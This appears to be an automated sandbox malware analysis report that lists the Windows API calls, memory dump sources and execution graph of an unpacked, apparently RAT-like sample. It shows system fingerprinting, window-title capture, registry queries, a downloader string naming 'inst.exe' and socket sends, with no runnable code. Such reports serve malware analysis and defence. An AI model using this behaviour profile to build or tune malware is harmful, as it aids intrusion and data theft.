                                                                                                                                                                        • Part of subcall function 100114A3: InitializeSListHead.KERNEL32(10017318,10010C07,10014EC8,00000010,10010B98,?,?,?,10010DBE,?,00000001,?,?,00000001,?,10014F10), ref: 100114A8
                                                                                                                                                                      • _initterm_e.API-MS-WIN-CRT-RUNTIME-L1-1-0(10012320,10012324,10014EC8,00000010,10010B98,?,?,?,10010DBE,?,00000001,?,?,00000001,?,10014F10), ref: 10010C16
                                                                                                                                                                      • _initterm.API-MS-WIN-CRT-RUNTIME-L1-1-0(10012300,1001231C,10014EC8,00000010,10010B98,?,?,?,10010DBE,?,00000001,?,?,00000001,?,10014F10), ref: 10010C34
                                                                                                                                                                      • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 10010C67
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.1781648815.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.1781607446.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000001.00000002.1781724637.0000000010012000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000001.00000002.1781825804.0000000010017000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000001.00000002.1781861555.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_10000000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Initialize$HeadList___scrt_is_nonwritable_in_current_image_initterm_initterm_e
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 590286634-0
                                                                                                                                                                      • Opcode ID: 5bd69a3745def1f0a502212b4dd3d1811da621de82d7f1043a7733e41357daf7
                                                                                                                                                                      • Instruction ID: 39f7e9c7f58ab3c24a5f1c768587727ae30ebfb406468ad2b612d2fa9f71a151
                                                                                                                                                                      • Opcode Fuzzy Hash: 5bd69a3745def1f0a502212b4dd3d1811da621de82d7f1043a7733e41357daf7
                                                                                                                                                                      • Instruction Fuzzy Hash: D421027A7482129AEB18EBB898027CC37A1EF11364F108205F4C96F1C3DBF1E5C18A96
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 1000CAC0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP140(?,1000BEEA,1000CEAD,1000CEAD,6CC04730), ref: 1000CAE4
                                                                                                                                                                      • ?good@ios_base@std@@QBE_NXZ.MSVCP140(1000CEAD,1000CEAD), ref: 1000BEFC
                                                                                                                                                                      • ?tie@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_ostream@DU?$char_traits@D@std@@@2@XZ.MSVCP140 ref: 1000BF1D
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.1781648815.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.1781607446.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000001.00000002.1781724637.0000000010012000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000001.00000002.1781825804.0000000010017000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000001.00000002.1781861555.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_10000000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: U?$char_traits@$D@std@@@2@D@std@@@std@@$?good@ios_base@std@@?rdbuf@?$basic_ios@?tie@?$basic_ios@V?$basic_ostream@V?$basic_streambuf@
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3792166412-0
                                                                                                                                                                      • Opcode ID: ae12adcc2c32b88dafc5603b844eb9ac3b5d40635a87f722cfffed01479731d9
                                                                                                                                                                      • Instruction ID: 6403fa240c7e006dd5772fa615f9af8d9caa538eb968de4636cddec1bc8cd2ef
                                                                                                                                                                      • Opcode Fuzzy Hash: ae12adcc2c32b88dafc5603b844eb9ac3b5d40635a87f722cfffed01479731d9
                                                                                                                                                                      • Instruction Fuzzy Hash: EF216D7460064AEFD704CF54C984BAEBBB1FF49344F14C269E8165B391C730E940CB91
                                                                                                                                                                      APIs
                                                                                                                                                                      • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 1000B2AD
                                                                                                                                                                      • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 1000B2BA
                                                                                                                                                                      • ?egptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 1000B2C5
                                                                                                                                                                      • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 1000B2D2
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.1781648815.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.1781607446.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000001.00000002.1781724637.0000000010012000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000001.00000002.1781825804.0000000010017000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000001.00000002.1781861555.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_10000000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: D@std@@@std@@U?$char_traits@$?gptr@?$basic_streambuf@$?egptr@?$basic_streambuf@
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2950233615-0
                                                                                                                                                                      • Opcode ID: 1783d4faa295622926a9acba5ea9b70e108ed3dee63503e54d904724665c109e
                                                                                                                                                                      • Instruction ID: 286a1d44accefb07714ea732755267c184901f6fbadf7b8dc8f0254af49e132d
                                                                                                                                                                      • Opcode Fuzzy Hash: 1783d4faa295622926a9acba5ea9b70e108ed3dee63503e54d904724665c109e
                                                                                                                                                                      • Instruction Fuzzy Hash: A5110D74E00219EFDB14DFA4D9958AEB7F5FF48240B204199E805A7355EB30AF01EB90
                                                                                                                                                                      APIs
                                                                                                                                                                      • ?eback@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140(?,?,1000B486), ref: 1000C0CA
                                                                                                                                                                      • ?eback@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140(?,1000B486), ref: 1000C0DD
                                                                                                                                                                      • ?egptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140(?,1000B486), ref: 1000C0EC
                                                                                                                                                                      • ?setg@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEXPAD00@Z.MSVCP140(1000B44A,1000B44A,1000B449,?,1000B486), ref: 1000C110
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.1781648815.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.1781607446.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000001.00000002.1781724637.0000000010012000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000001.00000002.1781825804.0000000010017000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000001.00000002.1781861555.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_10000000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: D@std@@@std@@U?$char_traits@$?eback@?$basic_streambuf@$?egptr@?$basic_streambuf@?setg@?$basic_streambuf@D00@
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3089488326-0
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetCurrentThread.KERNEL32 ref: 028705F4
                                                                                                                                                                      • WaitForSingleObject.KERNEL32(00000000), ref: 028705FB
                                                                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,100048C0,00000000,00000000,00000000), ref: 02870610
                                                                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,100100C0,00000000,00000000,00000000), ref: 02870625
                                                                                                                                                                        • Part of subcall function 02861147: LoadLibraryW.KERNEL32(10012398), ref: 02861152
                                                                                                                                                                        • Part of subcall function 02861147: GetProcAddress.KERNEL32(?,100123AC), ref: 02861164
                                                                                                                                                                        • Part of subcall function 02861147: GetProcAddress.KERNEL32(?,100123C0), ref: 02861178
                                                                                                                                                                        • Part of subcall function 02861147: GetModuleHandleA.KERNEL32(00000000), ref: 028611D4
                                                                                                                                                                        • Part of subcall function 02861147: RegisterClassW.USER32(?), ref: 028611E8
                                                                                                                                                                        • Part of subcall function 02861147: CreateWindowExW.USER32(00000000,100123D8,100123EC,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 0286120D
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.1778533321.0000000002860000.00000040.00001000.00020000.00000000.sdmp, Offset: 02860000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_2860000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateThread$AddressProc$ClassCurrentHandleLibraryLoadModuleObjectRegisterSingleWaitWindow
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 487361192-0
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetSystemTimeAsFileTime.KERNEL32(00000001), ref: 028713D2
                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 028713E1
                                                                                                                                                                      • GetCurrentProcessId.KERNEL32 ref: 028713EA
                                                                                                                                                                      • QueryPerformanceCounter.KERNEL32(?), ref: 028713F7
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.1778533321.0000000002860000.00000040.00001000.00020000.00000000.sdmp, Offset: 02860000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_2860000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2933794660-0
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 100046D3
                                                                                                                                                                      • Concurrency::task_continuation_context::task_continuation_context.LIBCPMTD ref: 100047D2
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.1781648815.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.1781607446.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000001.00000002.1781724637.0000000010012000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000001.00000002.1781825804.0000000010017000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000001.00000002.1781861555.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_10000000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Concurrency::task_continuation_context::task_continuation_contextFileModuleName
                                                                                                                                                                      • String ID: .exe
                                                                                                                                                                      • API String ID: 2188046178-4119554291
                                                                                                                                                                      APIs
                                                                                                                                                                      • AcquireSRWLockExclusive.KERNEL32(100172D4,?,URLDownloader,?,1000177C,100176B8,?,?,?,?,100019DB,inst.exe,00C40000,80000000,80000000,00000190), ref: 1001077C
                                                                                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(100172D4,?,1000177C,100176B8,?,?,?,?,100019DB,inst.exe,00C40000,80000000,80000000,00000190,00000078,00000000), ref: 100107B6
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.1781648815.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.1781607446.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000001.00000002.1781724637.0000000010012000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000001.00000002.1781825804.0000000010017000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000001.00000002.1781861555.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_10000000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ExclusiveLock$AcquireRelease
                                                                                                                                                                      • String ID: URLDownloader
                                                                                                                                                                      • API String ID: 17069307-1891997712
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000002.00000002.2562238563.0000000025ABC000.00000004.00000010.00020000.00000000.sdmp, Offset: 25ABC000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_2_2_25abc000_Synaptics.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:

                                                                                                                                                                      Execution Graph

                                                                                                                                                                      Execution Coverage:5.3%
                                                                                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                      Signature Coverage:0.3%
                                                                                                                                                                      Total number of Nodes:604
                                                                                                                                                                      Total number of Limit Nodes:24
QueryPerformanceCounter 43791->43808 43796 37810fc 43792->43796 43795 3781210 43795->43783 43798 3781108 ___DllMainCRTStartup 43796->43798 43797 3781155 43806 37811a5 ___DllMainCRTStartup 43797->43806 43861 377e480 43797->43861 43798->43797 43798->43806 43809 3780f98 43798->43809 43802 3781185 43804 3780f98 __CRT_INIT@12 149 API calls 43802->43804 43802->43806 43803 377e480 ___DllMainCRTStartup 526 API calls 43805 378117c 43803->43805 43804->43806 43807 3780f98 __CRT_INIT@12 149 API calls 43805->43807 43806->43795 43807->43802 43808->43792 43810 3780fa4 ___DllMainCRTStartup 43809->43810 43811 3780fac 43810->43811 43812 3781026 43810->43812 43865 3781a1b HeapCreate 43811->43865 43814 378102c 43812->43814 43815 3781087 43812->43815 43821 378104a 43814->43821 43827 3780fb5 ___DllMainCRTStartup 43814->43827 43875 3781ce6 66 API calls _doexit 43814->43875 43816 378108c 43815->43816 43817 37810e5 43815->43817 43880 3783ca0 TlsGetValue 43816->43880 43817->43827 43908 3783fa6 79 API calls __freefls@4 43817->43908 43818 3780fb1 43820 3780fbc 43818->43820 43818->43827 43866 3784014 86 API calls 5 library calls 43820->43866 43826 378105e 43821->43826 43876 3787dfb 67 API calls _free 43821->43876 43879 3781071 70 API calls __mtterm 43826->43879 43827->43797 43829 3780fc1 __RTC_Initialize 43833 3780fc5 43829->43833 43840 3780fd1 GetCommandLineA 43829->43840 43867 3781a39 HeapDestroy 43833->43867 43834 3781054 43877 3783cf1 70 API calls _free 43834->43877 43835 37810a9 DecodePointer 43841 37810be 43835->43841 43838 3780fca 43838->43827 43839 3781059 43878 3781a39 HeapDestroy 43839->43878 43868 378817f 71 API calls 2 library calls 43840->43868 43844 37810d9 43841->43844 43845 37810c2 43841->43845 43902 377f639 43844->43902 43889 3783d2e 43845->43889 43846 3780fe1 43869 3787bb6 73 API calls __calloc_crt 43846->43869 43850 37810c9 GetCurrentThreadId 43850->43827 43851 3780feb 43852 3780fef 43851->43852 43871 37880c4 95 API calls 3 library calls 43851->43871 43870 3783cf1 70 API 
calls _free 43852->43870 43855 3780ffb 43860 378100f 43855->43860 43872 3787e4e 94 API calls 6 library calls 43855->43872 43858 3781004 43858->43860 43873 3781af9 77 API calls 4 library calls 43858->43873 43860->43838 43874 3787dfb 67 API calls _free 43860->43874 43862 377e4af 43861->43862 43863 377e489 43861->43863 43862->43802 43862->43803 43863->43862 43864 377e491 CreateThread WaitForSingleObject 43863->43864 43864->43862 43909 377df10 43864->43909 43865->43818 43866->43829 43867->43838 43868->43846 43869->43851 43870->43833 43871->43855 43872->43858 43873->43860 43874->43852 43875->43821 43876->43834 43877->43839 43878->43826 43879->43827 43881 3781091 43880->43881 43882 3783cb5 DecodePointer TlsSetValue 43880->43882 43883 3784534 43881->43883 43882->43881 43885 378453d 43883->43885 43884 378a6f2 __calloc_crt 65 API calls 43884->43885 43885->43884 43886 378109d 43885->43886 43887 378455b Sleep 43885->43887 43886->43827 43886->43835 43888 3784570 43887->43888 43888->43885 43888->43886 43890 3784300 ___DllMainCRTStartup 43889->43890 43891 3783d3a GetModuleHandleW 43890->43891 43892 3788e5b __lock 64 API calls 43891->43892 43893 3783d78 InterlockedIncrement 43892->43893 43894 3783dd0 __getptd_noexit LeaveCriticalSection 43893->43894 43895 3783d92 43894->43895 43896 3788e5b __lock 64 API calls 43895->43896 43897 3783d99 43896->43897 43898 3784d46 ___addlocaleref 8 API calls 43897->43898 43899 3783db7 43898->43899 43900 3783dd9 __getptd_noexit LeaveCriticalSection 43899->43900 43901 3783dc4 ___DllMainCRTStartup 43900->43901 43901->43850 43903 377f644 RtlFreeHeap 43902->43903 43907 377f66d _free 43902->43907 43904 377f659 43903->43904 43903->43907 43905 377f91b __wcsnicmp_l 64 API calls 43904->43905 43906 377f65f GetLastError 43905->43906 43906->43907 43907->43827 43908->43827 43910 3780542 67 API calls 43909->43910 43911 377df5a Sleep 43910->43911 43912 377df97 43911->43912 43913 377df74 43911->43913 43915 377dfa4 GetLocalTime wsprintfW SetUnhandledExceptionFilter 
43912->43915 43916 377df9f 43912->43916 43914 377f707 77 API calls 43913->43914 43918 377df7b 43914->43918 43917 377fa29 289 API calls 43915->43917 43919 3777620 14 API calls 43916->43919 43920 377e003 CloseHandle 43917->43920 43921 377fa29 289 API calls 43918->43921 43919->43915 43922 377f707 77 API calls 43920->43922 43923 377df8d CloseHandle 43921->43923 43924 377e014 43922->43924 43923->43912 43925 377e022 43924->43925 43926 3772c90 8 API calls 43924->43926 43927 377f707 77 API calls 43925->43927 43926->43925 43928 377e036 43927->43928 43929 3779730 80 API calls 43928->43929 43934 377e04e 43928->43934 43929->43934 43930 377f876 66 API calls __NMSG_WRITE 43930->43934 43931 377e189 EnumWindows 43932 377e1a5 Sleep EnumWindows 43931->43932 43931->43934 43932->43932 43932->43934 43933 3780542 67 API calls 43933->43934 43934->43930 43934->43931 43934->43933 43935 377e1f0 Sleep 43934->43935 43936 377e239 CreateEventA 43934->43936 43952 3772da0 306 API calls 43934->43952 43935->43934 43937 377f876 __NMSG_WRITE 66 API calls 43936->43937 43942 377e281 43937->43942 43938 377ca70 113 API calls 43938->43942 43939 377e2bf Sleep RegOpenKeyExW 43941 377e2f5 RegQueryValueExW 43939->43941 43939->43942 43940 3775430 268 API calls 43940->43942 43941->43942 43942->43938 43942->43939 43942->43940 43943 377e339 43942->43943 43944 377e345 CloseHandle 43943->43944 43945 377fa29 289 API calls 43943->43945 43946 377e39f Sleep 43943->43946 43947 377e422 WaitForSingleObject CloseHandle 43943->43947 43948 3780542 67 API calls 43943->43948 43949 377e3dd Sleep CloseHandle 43943->43949 43950 377e3cd WaitForSingleObject CloseHandle 43943->43950 43944->43934 43945->43943 43946->43943 43947->43943 43951 377e43c Sleep CloseHandle 43948->43951 43949->43934 43950->43949 43951->43934 43952->43934 43953->43708 43954->43726 43955->43483 43956 2c63200 Sleep 43957 2c80254 43956->43957 43958 2c6474c lstrlenW 43959 2c7fff8 43958->43959 43960 2c6608a 43961 2c660a0 RegOpenKeyExW 43960->43961 43962 2c63f35 
__wcsrev 43961->43962 43963 2c6638b 43964 2c61100 70 API calls 43963->43964 43965 2c66390 43964->43965 43966 2bd0032 43977 2bd0ae4 GetPEB 43966->43977 43969 2bd0ae4 GetPEB 43972 2bd02a7 43969->43972 43970 2bd04a6 GetNativeSystemInfo 43971 2bd04d3 VirtualAlloc 43970->43971 43975 2bd0a02 43970->43975 43973 2bd04ec VirtualAlloc 43971->43973 43974 2bd04ff 43971->43974 43972->43970 43972->43975 43973->43974 43979 2c67813 43974->43979 43978 2bd029b 43977->43978 43978->43969 43980 2c67823 43979->43980 43981 2c6781e 43979->43981 43985 2c6771d 43980->43985 43993 2c6b54b GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 43981->43993 43984 2c67831 43984->43975 43986 2c67729 __write 43985->43986 43987 2c67776 43986->43987 43988 2c677c6 __write 43986->43988 43994 2c675b9 43986->43994 43987->43988 43990 2c677a6 43987->43990 43992 2c675b9 __CRT_INIT@12 149 API calls 43987->43992 43988->43984 43990->43988 43991 2c675b9 __CRT_INIT@12 149 API calls 43990->43991 43991->43988 43992->43990 43993->43980 43995 2c675c5 __write 43994->43995 43996 2c67647 43995->43996 43997 2c675cd 43995->43997 43999 2c6764d 43996->43999 44000 2c676a8 43996->44000 44047 2c6803b HeapCreate 43997->44047 44006 2c6766b 43999->44006 44013 2c675d6 __write 43999->44013 44057 2c68306 66 API calls _doexit 43999->44057 44001 2c67706 44000->44001 44002 2c676ad 44000->44002 44001->44013 44063 2c69a58 79 API calls __freefls@4 44001->44063 44004 2c69754 ___set_flsgetvalue 3 API calls 44002->44004 44003 2c675d2 44005 2c675dd 44003->44005 44003->44013 44008 2c676b2 44004->44008 44048 2c69ac6 86 API calls 5 library calls 44005->44048 44011 2c6767f 44006->44011 44058 2c6b0e4 67 API calls _free 44006->44058 44012 2c69fe4 __calloc_crt 66 API calls 44008->44012 44061 2c67692 70 API calls __mtterm 44011->44061 44016 2c676be 44012->44016 44013->43987 44016->44013 44018 2c676ca DecodePointer 44016->44018 44017 2c67675 44059 2c697a5 70 API calls _free 44017->44059 44025 2c676df 
44018->44025 44021 2c675e2 __RTC_Initialize 44024 2c675f2 GetCommandLineA 44021->44024 44039 2c675e6 44021->44039 44022 2c675eb 44022->44013 44023 2c6767a 44060 2c68059 HeapDestroy 44023->44060 44050 2c6b468 71 API calls 2 library calls 44024->44050 44028 2c676e3 44025->44028 44029 2c676fa 44025->44029 44032 2c697e2 __getptd_noexit 66 API calls 44028->44032 44062 2c66e49 66 API calls 2 library calls 44029->44062 44030 2c67602 44051 2c6ae9f 73 API calls __calloc_crt 44030->44051 44035 2c676ea GetCurrentThreadId 44032->44035 44034 2c6760c 44036 2c67610 44034->44036 44053 2c6b3ad 95 API calls 3 library calls 44034->44053 44035->44013 44052 2c697a5 70 API calls _free 44036->44052 44049 2c68059 HeapDestroy 44039->44049 44040 2c6761c 44041 2c67630 44040->44041 44054 2c6b137 94 API calls 6 library calls 44040->44054 44046 2c67635 44041->44046 44056 2c6b0e4 67 API calls _free 44041->44056 44044 2c67625 44044->44041 44055 2c68119 77 API calls 4 library calls 44044->44055 44046->44013 44047->44003 44048->44021 44049->44022 44050->44030 44051->44034 44052->44039 44053->44040 44054->44044 44055->44041 44056->44036 44057->44006 44058->44017 44059->44023 44060->44011 44061->44013 44062->44013 44063->44013 44064 2c64274 44065 2c7f814 CreateThread 44064->44065 44067 2c66110 44065->44067 44067->44067 44068 2c65eb2 Sleep 44071 2c66f17 44068->44071 44073 2c66f21 44071->44073 44072 2c66e83 _malloc 66 API calls 44072->44073 44073->44072 44074 2c65ec9 44073->44074 44076 2c66f3d std::exception::exception 44073->44076 44083 2c68550 DecodePointer 44073->44083 44082 2c66f7b 44076->44082 44084 2c673e9 76 API calls __cinit 44076->44084 44078 2c66f85 44086 2c67836 RaiseException 44078->44086 44081 2c66f96 44085 2c66e24 66 API calls std::exception::operator= 44082->44085 44083->44073 44084->44082 44085->44078 44086->44081 44087 2c7f0df 44094 2c62c60 WSAStartup CreateEventW InterlockedExchange 44087->44094 44089 2c66f17 77 API calls 44090 2c7f0e4 44089->44090 44090->44089 44091 2c7f7db 
44090->44091 44097 2c65a20 CreateEventW 44091->44097 44095 2c66815 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 44094->44095 44096 2c62cff 44095->44096 44096->44090 44098 2c65a83 44097->44098 44099 2c65a79 44097->44099 44125 2c66410 HeapCreate 44098->44125 44131 2c61280 DeleteCriticalSection RaiseException __CxxThrowException@8 44099->44131 44103 2c65b12 44132 2c61280 DeleteCriticalSection RaiseException __CxxThrowException@8 44103->44132 44104 2c65b1c CreateEventW 44105 2c65b55 44104->44105 44106 2c65b5f CreateEventW 44104->44106 44133 2c61280 DeleteCriticalSection RaiseException __CxxThrowException@8 44105->44133 44109 2c65b84 CreateEventW 44106->44109 44110 2c65b7a 44106->44110 44112 2c65b9f 44109->44112 44113 2c65ba9 InitializeCriticalSectionAndSpinCount 44109->44113 44134 2c61280 DeleteCriticalSection RaiseException __CxxThrowException@8 44110->44134 44135 2c61280 DeleteCriticalSection RaiseException __CxxThrowException@8 44112->44135 44115 2c65c77 InitializeCriticalSectionAndSpinCount 44113->44115 44116 2c65c6d 44113->44116 44118 2c65c8e 44115->44118 44119 2c65c98 InterlockedExchange timeGetTime CreateEventW CreateEventW 44115->44119 44136 2c61280 DeleteCriticalSection RaiseException __CxxThrowException@8 44116->44136 44137 2c61280 DeleteCriticalSection RaiseException __CxxThrowException@8 44118->44137 44121 2c667ff 77 API calls 44119->44121 44122 2c65d2b 44121->44122 44123 2c667ff 77 API calls 44122->44123 44124 2c65d3b 44123->44124 44126 2c66437 44125->44126 44127 2c66441 44125->44127 44138 2c61280 DeleteCriticalSection RaiseException __CxxThrowException@8 44126->44138 44129 2c65af2 InitializeCriticalSectionAndSpinCount 44127->44129 44139 2c66e49 66 API calls 2 library calls 44127->44139 44129->44103 44129->44104 44131->44098 44132->44104 44133->44106 44134->44109 44135->44113 44136->44115 44137->44119 44138->44127 44139->44129 44140 2c7f63d send

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 0377F707: _malloc.LIBCMT ref: 0377F721
                                                                                                                                                                      • _memset.LIBCMT ref: 0377546C
                                                                                                                                                                      • _memset.LIBCMT ref: 03775485
                                                                                                                                                                      • _memset.LIBCMT ref: 03775495
                                                                                                                                                                      • gethostname.WS2_32(?,00000032), ref: 037754A3
                                                                                                                                                                      • gethostbyname.WS2_32(?), ref: 037754AD
                                                                                                                                                                      • inet_ntoa.WS2_32 ref: 037754C5
                                                                                                                                                                      • _strcat_s.LIBCMT ref: 037754D8
                                                                                                                                                                      • _strcat_s.LIBCMT ref: 037754F1
                                                                                                                                                                      • inet_ntoa.WS2_32 ref: 0377551A
                                                                                                                                                                      • _strcat_s.LIBCMT ref: 0377552D
                                                                                                                                                                      • _strcat_s.LIBCMT ref: 03775546
                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 03775573
                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000002,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 03775587
                                                                                                                                                                      • GetLastInputInfo.USER32(?), ref: 0377559A
                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 037755A0
                                                                                                                                                                      • wsprintfW.USER32 ref: 037755D5
                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 037755E8
                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000296,00000000), ref: 037755FC
                                                                                                                                                                      • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 03775653
                                                                                                                                                                      • wsprintfW.USER32 ref: 0377566C
                                                                                                                                                                      • GetForegroundWindow.USER32 ref: 03775695
                                                                                                                                                                      • GetWindowTextW.USER32(00000000,000006CE,000000FA), ref: 037756AC
                                                                                                                                                                      • lstrlenW.KERNEL32(000008CC), ref: 037756D3
                                                                                                                                                                      • lstrlenW.KERNEL32(00000994), ref: 03775739
                                                                                                                                                                      • GetModuleHandleW.KERNEL32(kernel32.dll,GetNativeSystemInfo), ref: 037757AA
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 037757B1
                                                                                                                                                                      • GetNativeSystemInfo.KERNEL32(?), ref: 037757C2
                                                                                                                                                                      • GetSystemInfo.KERNEL32(?), ref: 037757CD
                                                                                                                                                                      • wsprintfW.USER32 ref: 03775806
                                                                                                                                                                      • GetCurrentProcessId.KERNEL32 ref: 03775818
                                                                                                                                                                      • OpenProcess.KERNEL32(00000400,00000000,00000000), ref: 0377582E
                                                                                                                                                                      • K32GetProcessImageFileNameW.KERNEL32(00000000,?,00000104), ref: 0377584B
                                                                                                                                                                      • CloseHandle.KERNEL32(03795164), ref: 0377587F
